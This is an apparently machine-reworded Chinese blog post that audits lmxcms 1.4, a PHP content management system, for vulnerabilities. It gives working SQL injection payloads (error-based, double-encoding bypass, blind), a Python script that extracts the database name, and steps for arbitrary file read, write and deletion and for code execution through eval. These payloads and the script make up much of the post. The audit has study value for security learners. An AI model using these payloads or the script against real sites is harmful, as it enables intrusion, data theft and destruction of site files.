首页 » 网站推广 » php过滤posthtml技巧_lmxcms代码审计进修

php过滤posthtml技巧_lmxcms代码审计进修

访客 2024-11-24 0

扫一扫用手机浏览

文章目录 [+]

网站首页

后台管理

php过滤posthtml技巧_lmxcms代码审计进修

搭建成功

php过滤posthtml技巧_lmxcms代码审计进修
(图片来自网络侵删)
框架配置

入口文件

config.inc.php配置文件

run.inc.php 初始化文件

入口

在Action.class.php中找到调用方法的

可以看出m参数是类名前缀,开头大写,a参数是方法名

那么我就知道该框架处理要求的格式如下

http://127.0.0.1/lmxcms1.4/admin.php?m=xx类名&a=xx方法

【----帮助网安学习,须要网安学习资料关注我,私信回答“资料”免费获取----】① 网安学习发展路径思维导图② 60+网安经典常用工具包③ 100+SRC漏洞剖析报告④ 150+网安攻防实战技能电子书⑤ 最威信CISSP 认证考试指南+题库⑥ 超1800页CTF实战技巧手册⑦ 最新网安大厂口试题合集(含答案)⑧ APP客户端安全检测指南(安卓+IOS)

后台SQL注入

在bookaction.class.php

在这里可以看到这个id是可控的,于是进入getReply函数里看看

创造这里实行了SQL语句

在后面写个echo$sql方便看

由于正常输入没回显,采纳报错注入

admin.php?m=Book&a=reply&id=1) and updatexml(0,concat(0x7e,user()),1)--+

前台SQL注入

TagsAction.class.php中

看不出来$data['name']的值是如何来的,查看的p的方法

可以看到type=2的时候为GET通报,解释我们可以掌握这个参数,连续看能不能利用

查看getNameData的声明

查看oneModel

查看oneDB

接着在这上面写个echo $sql;

/index.php/?m=Tags&name=1

会跳404,但echo 出来了sql语句,解释这个过程是有sql语句实行的

这个时候连续利用报错函数实行试试

' and updatexml(0,concat(0x7e,user()),1) --+

创造是空缺,连报错都没有,实在仔细看之前common.php里,有filter_sql方法

但是这里写了一个url解码的函数,且这个语句实行是在sql语句过滤实行的后面,那么我考试测验二次编码注入

实行成功,但在1.41版本的修复了这个漏洞

这里用代码比拟下可以明显看出来

前台留言SQL注入

在前台留言这里

随便提交一个,提交成功并没有显示,进后台看看

须要审核才能显示

审查源码

在BookAction.class.php中,创造POST传setbook后会进入checkdata函数

里面是验证前台数据并且过滤了html代码并且有filter_sql

过滤了sql语句常用函数,在这里就不能用二次编码绕过了,由于这里没写url解码函数

查看addmodel

查看addDB

纵然我们有二次注入的思路,但这个须要管理员审核才能看到回显

随便测试一个看看

在数据库中显示为

可以看出这个ischeck是判断是否显示在前台的,那么我们进行注入,把ischeck修正为1就可以回显在前端了

POST提交

setbook=1&name=1&content=1&time,ischeck)VALUES((select//version()),'1','','','127.0.0.1','1679301152','1')#=1

前台布尔盲注

searchaction.class.php

serchmodel

countModel

countDB

在这里写入echo $sql;方便考试测验注入

利用这些参数进行注入

可以利用tuijian这个参数注入,或者也可以用renmen看布局问题

SELECT count(1) FROM lmx_product_data WHERE time > 1647768137 ANDremen=1 AND (title like '%a%') ORDER BY id desc

实行如上sql语句,这里同样也进行了filter_sql函数过滤,且没有url编码不能向第一个那样二次编码绕过,详细可在p方法里找

index.php?m=search&a=index&keywords=a&mid=1&remen=1%20or%20(if(ascii(substr(database(),1,1))=0x6c,1,0))--+

GET/lmxcms1.4/index.php?m=search&keywords=b&mid=1&tuijian=id%20or%20(if(ascii(substr(database(),1,1))=0x6,1,0));%23

这里0x6c对应的是l

回显长度为8425,随便改个参数,返回包长度变为5403

用remen参数回显为8422

写一个大略的python脚本就可以测出值

import requests\flag=""\url="http://127.0.0.1/lmxcms1.4/index.php?m=search&a=index&keywords=a&mid=1&remen=1%20or%20(if(ascii(substr(database(),{},1))={},1,0))%23"\for i in range(1,7):\for j in range(65,122):\res=requests.get(url.format(i,hex(j)))\if len(res.text)>7000:\flag=flag+chr(j)\print(flag)\else:\print(url)\print(flag)

任意文件读取&任意文件写入

文件读取函数freadfopenfilefile_get_contents搜索file_get_contents然后找file_get_contents函数和参数代码段,

在file.class.php getcon方法里

file_get_contents具有读取文件内容的功能,这里$path变量我们要看怎么来的,于是查看getcon的用法

在TemplateAction.class.php中调用了getcon

查看$dir变量怎么来的

该页面在admin目录下,那么进入后台根据页面名称传参调用考试测验任意文件读取

lmxcms1.4/admin.php?m=Template&a=editfile

传$dir

还可以读取数据库文件

同样这里还可以进行任意文件写入

可以在这个页面直接进行修正或者写入

分别是文件名称跟内容,file_put_contents函数写入

任意文件删除

在BackdbAction.class.php中搜索unlink

这里看到filename可控,查看delone

file/back下创建一个文件测试1.txthttp://localhost/lmxcms1.4/admin.php?m=backdb&a=delbackdb&filename=1.txt

通过../../实现任意文件删除

再次访问就须要安装了

命令实行

在admin/AcquisiAction.class.php中搜索eval

可以看出$eval函数的参数$temdata是$this->model->caijiDataOne($_GET['cid']);跟进

可以看出实行了sql语句,通过跟进ci_data_tab创造

查询的是cj_data表

在cj_data表中插入phpinfo();

lmxcms1.4/admin.php?m=Acquisi&a=showCjData&id=1&cid=1&lid=1

总结

这次是对phpmvc框架的审计的考试测验,思路是从危险函数入手,探求可控参数变量,考试测验利用触发,白盒+黑盒一起考试测验可能会效果更佳,觉得自己有好多地方不敷,很多都是参考网上的或者别人的思路才能完成审计实现,希望能对大家有所帮助,不敷之处希望大家能够批评示正。

标签:

相关文章

php来路地址技巧_实例讲解防盗链技能

盗链的定义此内容不在自己做事器上,而通过技能手段,绕过别人放广告有利益的终极页,直接在自己的有广告有利益的页面上向终极用户供应此内...

网站推广 2024-12-19 阅读0 评论0

php中不转译技巧_PHP 7 新特点

PHP 7 中的函数的形参类型声明可以是标量了。在 PHP 5 中只能是类名、接口、array 或者 callable (PHP...

网站推广 2024-12-19 阅读0 评论0